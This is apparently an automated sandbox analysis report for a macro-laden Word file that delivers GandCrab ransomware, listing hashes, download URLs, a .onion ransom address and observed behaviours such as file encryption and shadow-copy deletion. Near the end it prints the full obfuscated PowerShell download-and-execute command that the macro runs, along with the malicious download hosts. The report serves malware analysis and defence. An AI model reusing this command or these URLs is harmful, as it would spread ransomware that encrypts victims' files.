Analysis
-
max time kernel
145s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
21-05-2022 00:29
Static task
static1
Behavioral task
behavioral1
Sample
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
Resource
win10v2004-20220414-en
General
-
Target
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm
-
Size
78KB
-
MD5
fe2d1caa2d52000efcd19ea1ea31d254
-
SHA1
6496aa6a299bc606ee9d058bdf4f0d826a2e4541
-
SHA256
dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb
-
SHA512
592a3447aa75b48b578b9f6b08524482b16c701f152b2fc2c074e63a9be84f250b380913b172e44af1dffbb0e223b6f17b959ac342b417fcbccadb3272b51f2d
Malware Config
Extracted
https://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe
http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
https://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe
http://sndtgo.ru/word.exe
http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe
Extracted
C:\JQGGQ-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/4f6ecbe4c8a27fc9
Signatures
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 564 1732 cmd.exe WINWORD.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 4 556 powershell.exe 5 556 powershell.exe 9 556 powershell.exe 10 556 powershell.exe 13 556 powershell.exe 15 556 powershell.exe 17 556 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
229.exepid process 1476 229.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
229.exedescription ioc process File renamed C:\Users\Admin\Pictures\ExitUnregister.tif => C:\Users\Admin\Pictures\ExitUnregister.tif.jqggq 229.exe File renamed C:\Users\Admin\Pictures\MeasureSelect.png => C:\Users\Admin\Pictures\MeasureSelect.png.jqggq 229.exe File renamed C:\Users\Admin\Pictures\StopPush.png => C:\Users\Admin\Pictures\StopPush.png.jqggq 229.exe File opened for modification C:\Users\Admin\Pictures\DebugUnlock.tiff 229.exe File renamed C:\Users\Admin\Pictures\DebugUnlock.tiff => C:\Users\Admin\Pictures\DebugUnlock.tiff.jqggq 229.exe -
Drops startup file 2 IoCs
Processes:
229.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\JQGGQ-MANUAL.txt 229.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\c8a2782ac8a27fca11d.lock 229.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 556 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
229.exedescription ioc process File opened (read-only) \??\Y: 229.exe File opened (read-only) \??\G: 229.exe File opened (read-only) \??\K: 229.exe File opened (read-only) \??\P: 229.exe File opened (read-only) \??\U: 229.exe File opened (read-only) \??\V: 229.exe File opened (read-only) \??\W: 229.exe File opened (read-only) \??\A: 229.exe File opened (read-only) \??\B: 229.exe File opened (read-only) \??\L: 229.exe File opened (read-only) \??\M: 229.exe File opened (read-only) \??\N: 229.exe File opened (read-only) \??\R: 229.exe File opened (read-only) \??\T: 229.exe File opened (read-only) \??\X: 229.exe File opened (read-only) \??\E: 229.exe File opened (read-only) \??\I: 229.exe File opened (read-only) \??\J: 229.exe File opened (read-only) \??\O: 229.exe File opened (read-only) \??\Q: 229.exe File opened (read-only) \??\S: 229.exe File opened (read-only) \??\Z: 229.exe File opened (read-only) \??\F: 229.exe File opened (read-only) \??\H: 229.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
229.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp" 229.exe -
Drops file in Program Files directory 28 IoCs
Processes:
229.exedescription ioc process File opened for modification C:\Program Files\ImportDeny.eprtx 229.exe File opened for modification C:\Program Files\PushProtect.eprtx 229.exe File opened for modification C:\Program Files\SearchMove.potm 229.exe File opened for modification C:\Program Files\CompressUnlock.wma 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\JQGGQ-MANUAL.txt 229.exe File opened for modification C:\Program Files\BackupTrace.cr2 229.exe File opened for modification C:\Program Files\TestResolve.cr2 229.exe File opened for modification C:\Program Files\SendFormat.jpg 229.exe File opened for modification C:\Program Files\UnblockExit.wps 229.exe File created C:\Program Files (x86)\c8a2782ac8a27fca11d.lock 229.exe File opened for modification C:\Program Files\MoveSend.xht 229.exe File opened for modification C:\Program Files\ApproveExit.ogg 229.exe File opened for modification C:\Program Files\MergeCompress.001 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\c8a2782ac8a27fca11d.lock 229.exe File created C:\Program Files\JQGGQ-MANUAL.txt 229.exe File opened for modification C:\Program Files\WatchCompare.jfif 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\c8a2782ac8a27fca11d.lock 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\c8a2782ac8a27fca11d.lock 229.exe File opened for modification C:\Program Files\SaveGroup.svgz 229.exe File created C:\Program Files (x86)\JQGGQ-MANUAL.txt 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\JQGGQ-MANUAL.txt 229.exe File opened for modification C:\Program Files\UnlockCompress.xltm 229.exe File opened for modification C:\Program Files\GrantReset.zip 229.exe File opened for modification C:\Program Files\SubmitRedo.ram 229.exe File opened for modification C:\Program Files\UnblockLimit.ods 229.exe File opened for modification C:\Program Files\WatchUninstall.vst 229.exe File created C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\JQGGQ-MANUAL.txt 229.exe File created C:\Program Files\c8a2782ac8a27fca11d.lock 229.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
229.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 229.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 229.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 740 vssadmin.exe -
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\TypeLib\{24B06CE4-000C-4393-9506-9616D2AC9BAB}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\TypeLib WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\TypeLib\{24B06CE4-000C-4393-9506-9616D2AC9BAB}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\TypeLib\{24B06CE4-000C-4393-9506-9616D2AC9BAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exe229.exepid process 556 powershell.exe 556 powershell.exe 556 powershell.exe 1476 229.exe 1476 229.exe 1476 229.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
powershell.exeAUDIODG.EXEvssvc.exedescription pid process Token: SeDebugPrivilege 556 powershell.exe Token: 33 1708 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1708 AUDIODG.EXE Token: 33 1708 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1708 AUDIODG.EXE Token: SeBackupPrivilege 1680 vssvc.exe Token: SeRestorePrivilege 1680 vssvc.exe Token: SeAuditPrivilege 1680 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
229.exepid process 1476 229.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
229.exepid process 1476 229.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE 1732 WINWORD.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exe229.execmd.exedescription pid process target process PID 1732 wrote to memory of 564 1732 WINWORD.EXE cmd.exe PID 1732 wrote to memory of 564 1732 WINWORD.EXE cmd.exe PID 1732 wrote to memory of 564 1732 WINWORD.EXE cmd.exe PID 1732 wrote to memory of 564 1732 WINWORD.EXE cmd.exe PID 564 wrote to memory of 556 564 cmd.exe powershell.exe PID 564 wrote to memory of 556 564 cmd.exe powershell.exe PID 564 wrote to memory of 556 564 cmd.exe powershell.exe PID 564 wrote to memory of 556 564 cmd.exe powershell.exe PID 1732 wrote to memory of 1408 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1408 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1408 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1408 1732 WINWORD.EXE splwow64.exe PID 556 wrote to memory of 1476 556 powershell.exe 229.exe PID 556 wrote to memory of 1476 556 powershell.exe 229.exe PID 556 wrote to memory of 1476 556 powershell.exe 229.exe PID 556 wrote to memory of 1476 556 powershell.exe 229.exe PID 1476 wrote to memory of 1944 1476 229.exe cmd.exe PID 1476 wrote to memory of 1944 1476 229.exe cmd.exe PID 1476 wrote to memory of 1944 1476 229.exe cmd.exe PID 1476 wrote to memory of 1944 1476 229.exe cmd.exe PID 1944 wrote to memory of 740 1944 cmd.exe vssadmin.exe PID 1944 wrote to memory of 740 1944 cmd.exe vssadmin.exe PID 1944 wrote to memory of 740 1944 cmd.exe vssadmin.exe PID 1944 wrote to memory of 740 1944 cmd.exe vssadmin.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dcf3c03887af46b3160d984a6268ac3fcc6e659895ba4721e952ecaf363cfbdb.docm"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\cmd.exec:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
